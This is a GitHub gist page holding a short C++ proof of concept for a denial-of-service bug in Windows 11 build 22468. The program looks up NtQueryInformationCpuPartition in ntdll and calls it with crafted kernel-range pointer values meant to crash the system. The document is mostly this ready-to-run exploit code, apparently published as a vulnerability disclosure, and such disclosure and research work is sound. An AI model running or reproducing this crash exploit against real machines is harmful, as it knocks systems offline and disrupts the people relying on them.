Skip to content

Instantly share code, notes, and snippets.

@hfiref0x
Created October 5, 2021 10:33
Show Gist options
  • Save hfiref0x/48bdc12241d0a981a6da473e979c8aff to your computer and use it in GitHub Desktop.
Save hfiref0x/48bdc12241d0a981a6da473e979c8aff to your computer and use it in GitHub Desktop.
Denial of Service bug in Windows 11 (22468 build) NtQueryInformationCpuPartition
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtQueryInformationCpuPartition)(
ULONG_PTR PartitionHandle,
ULONG_PTR Flags,
ULONG_PTR OutputBuffer,
ULONG_PTR Length,
ULONG_PTR ReturnedLength
);
#define FUNC_NAME "NtQueryInformationCpuPartition"
int main()
{
HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll"));
pfnNtQueryInformationCpuPartition pvfn;
printf_s("[>]Start\r\n");
if (hDll) {
pvfn = (pfnNtQueryInformationCpuPartition)GetProcAddress(hDll, FUNC_NAME);
if (pvfn) {
NTSTATUS ntStatus = pvfn(0x00007ffffffefffe,
0xffff800000000001,
0x0000800000000000,
0x000000000000fffe,
0xfffff80000000000);
printf_s(">%s NTSTATUS 0x%lX\r\n", FUNC_NAME, ntStatus);
}
else {
DWORD lastError = GetLastError();
printf_s(">%s not found, GetLastError %lu\r\n", FUNC_NAME, lastError);
}
}
else {
printf_s(">No dll handle\r\n");
}
printf_s("[<]Stop");
ExitProcess(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment